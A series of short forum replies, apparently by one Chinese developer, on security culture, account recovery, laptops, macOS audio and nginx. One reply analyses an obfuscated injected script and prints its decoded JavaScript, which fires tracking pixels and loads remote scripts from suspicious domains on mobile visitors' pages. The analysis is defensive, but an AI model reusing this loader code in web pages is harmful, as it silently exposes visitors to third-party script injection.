没有人提一下 xfocus ？

八卦一下，当年 lion 搞了一票，现在跑去哪里了？有人知道吗？

看来这个面试问题，目测我这样的什么鬼都用，什么鬼都知道一点，什么鬼都没有深入的底层码农，目测是没有机会入大厂了

作为业余的安全人员，只能说这事情太常见了

不过同事嘛，熟悉的就私下聊天提一下，不熟悉的就直接丢公司安全组（假如有的话）

实话实说，安全这事情，多数的人，尤其是开发，觉得这根本不是事，与其跟其浪费心情，还不如不理不睬任其自生自灭好了，我几年前（ 12 年）发现公司某系统的一个任意文件下载漏洞，刚刚去看了一下，还在.........

Geek/Hacker 觉得这是 build a better world 的方式，但是很多人觉得这是利益相关，国人甚之

见过太多这样的事情，感觉都麻木了

发现有洞，冒险上报真是玩火的行为，反正非利益相关，爱怎么样就怎么样吧

用得很舒服，回来挖坟，写个感谢 ；）

我这几天 commit 的代码量都有 2k+ 行....... 真一行行手写的..........

@Pastsong 从账号的唯一性和安全性依然无法理解。毕竟这可是关系到账号核心安全的最后防线

考虑到你 primary mail 被收回了 /运营商倒闭了 /密码忘记了，我依稀记得（年代太久远，现在不一定是这样的逻辑）注册 apple id/gmail/dropbox 的时候都会有一个唯一的序列号，很长的账号恢复码，有这个号码就可以恢复账号了

其实我一直不是很明白 gayhub 的修改 primary mail address 的逻辑

修改原来的 primary mail 竟然是不用发邮件链接到 primary mail 点击后才能更换的，这让我特别无法理解

ThinkPad X220i，中途加了个内存、换了个 SATA SSD，中途坏过一次屏幕，公司免费送修

灰都没有清过，一直都是主力开发用机，几乎每天用，从 2012 还是 13 年 到现在，实在算已经用了 6 年，感觉还能战三年

然后这个 liuzhi520 自行搜索一下，很有趣的事情，有兴趣的同学可以深挖一下这两个域名～

后面这个 m8ze.js 搞的事情，其实也一样，这是解码后的代码：

(function(h,c){function g(k){try{var d=h.getElementsByTagName("head")[0];var l=d.appendChild(b(k));setTimeout(function(){d.removeChild(l)},2000)}catch(j){}}function f(d){return h.createElement(d)}function b(k){var d=f("script");d.type="text/javascript";d.async=true;d.src=k;return d}function a(m){var l="";var d=Math.floor(m.length/4);var k=m.length-4*d;for(var j=0;j<d;j++){l+=m.substr(4*j,3)}if(k>0){l+=m.substr(4*d)}l=decodeURIComponent(l);l=l.split("").reverse().join("");l=l.replace(/["]/g,"www");l=l.replace(/[>]/g,"http");l=l.replace(/[<]/g,".");return l}function i(){var d=new Image();d.src=a("p1j5tgmQ%3Dpw%3xFphIp%3ICci0p%2sF32Q07%c3Anlc%3BCxlgeolu%3Cbzm%w2F%r2F%N3A%W3E")}function e(){var d=new Image();d.src=a("llaLp1mb%3Dqw%3HFphUp%34CciXp%2lF32B07%W3Anfc%3KCxlleolB%3Cqzm%r2F%Q2F%h3A%63E")}if(Math.random()<0.02){i()}if(!c._uuid_mobi_all1_){c._uuid_mobi_all1_=1;if(Math.random()<0.02){e()}g(a("sj%f3Cnzim%03CyAreuqqj%42FbMti%U2Fs2er%L2FmBoc%v3CxXjb-tcs%o3Cmwh%28F%2rF%3VA%3dE"))}})(document,window);

一样的套路，分别访问了

"http://mz.loelx.cn:7023/pic.php?w=mgtj1p"
"http://mz.loelx.cn:7023/pic.php?w=m1pall"
"http://hm.sc-bjx.com/res/itb/jquery.min.js"

前面两个是 new Image() 用于跟踪访客的，最后的这个 jquery.min.js 很有意思的

其中有三句很蛋疼的加密语句

h("sj%33Cskcit2ylajna%x2FmSoc%d3CsLcit7ylavna-9elgCoogR%3C9%22g")
h("454L01%Z3DdJi%38Fphcp%3BCnoWmmo7c_shjdaT_trJ%2FU2mzV_trh%2Fwmocc%3CU0250ihzXuilr%3C5a%2cF%2EF%3MA%3IE")
h("sj%L3CeCz8mF%2F0btic%2Fwserz%2F5mocN%3Cexjby-cs8%3CGgi%l2F%R2F%s3A%73E")

代码上下文可知，这个 h 必定是解密字符串的函数啊，然而，这段 h 函数写得有点问题，自己修复一下执行解密后，结果分别是

"www.google-analytics.com/analytics.js"
"http://a.liuzhi520.com/rt_zm2/rt_adjs_common.php?id=10454"
"http://ig.sc-bjx.com/res/itb/m8ze.js"

你都解密出 eval 了，剩下的还不简单啊，那个 g[c()] 按照后面的传入参数，其实就相当于 window[eval()] ，那么剩下的解码就是 把后面的这段直接丢 console 执行即可

解码出来的就是这一段，请自己格式化一下吧：

(function(l,n){function f(o){try{var d=l.getElementsByTagName("head")[0];var q=d.appendChild(i(o));setTimeout(function(){d.removeChild(q)},2000)}catch(j){}}function c(d){return l.createElement(d)}function i(e){var d=c("script");d.type="text/javascript";d.async=true;d.src=e;return d}function h(p){var o="";var d=Math.floor(p.length/4);var j=p.length-4d;for(var e=0;e<d;e++){o+=p.substr(4e,3)}if(j>0){o+=p.substr(4d)}o=decodeURIComponent(o);o=o.split("").reverse().join("");o=o.replace(/["]/g,"www");o=o.replace(/[>]/g,"http");o=o.replace(/[<]/g,".");return o}try{var a="sj%33Cskcit2ylajna%x2FmSoc%d3CsLcit7ylavna-9elgCoogR%3C9%22g";a=h(a);var k=l.getElementsByTagName("script");for(var g=0;g<k.length;g++){if(k[g].src&&k[g].src.indexOf(a)==7){if(!n.g1wtj_uuid_a2n11){n.g1wtj_uuid_a2n11=1;f(["ht","tp","s://",a].join(""));if(top==this){var b=navigator.userAgent;if(b.indexOf("Android")>0||b.indexOf("Mobile")>0){if(!n.uuid_m8v_0212){n.uuid_m8v_0212=1;setTimeout(function(){f(h("454L01%Z3DdJi%38Fphcp%3BCnoWmmo7c_shjdaT_trJ%2FU2mzV_trh%2Fwmocc%3CU0250ihzXuilr%3C5a%2cF%2EF%3MA%3IE"));f(h("sj%L3CeCz8mF%2F0btic%2Fwserz%2F5mocN%3Cexjby-cs8%3CGgi%l2F%R2F%s3A%73E"))},10)}}}}break}}}catch(m){}})(document,window);

就这名字在中文的读音，怎么也得收藏点个赞～

大家都是 1TB 的收费 plan 来算的话，感觉跟 Dropbox 这些好像也没差多少。就这三两刀的区别，而 app 的生态好用太多太多

不过如果单纯是兼容 S3 的话，可以当作备胎用。哈哈哈哈～

以前我也一直觉得用 MacOS 就是为了装个逼，晒晒优越感......

直到我开始玩 Audio Interface 入手了 Ultralite MK4，Windows7/10 下面各种不成功，插上 MacOS 装个驱动，完美使用。各种软件，各种的驱动，真心省事

其他不说，如果你是影视、音频、编曲这样的创意制作者，用 MacOS 是不二之选，没有之一

一直在用 bitbucket 免费 private 仓库的同学路过表示内心毫无波澜～

当然了，多个免费的选择也是挺好的～

前面一个二个动不动就一万两万多少万的，让我这几千块账单的情何以堪

dive into 理解为“深入”？

虽然看不懂，不过多一个实现总是好事。加油！

每次 nginx reload 记得这样敲命令，反正我觉得这是 nginx reload 的最佳实践了

sudo nginx -t && sudo nginx -s reload && sudo tail -f /var/log/nginx/error.log

可以直接搞个命令的 alias，不过一定记得这样敲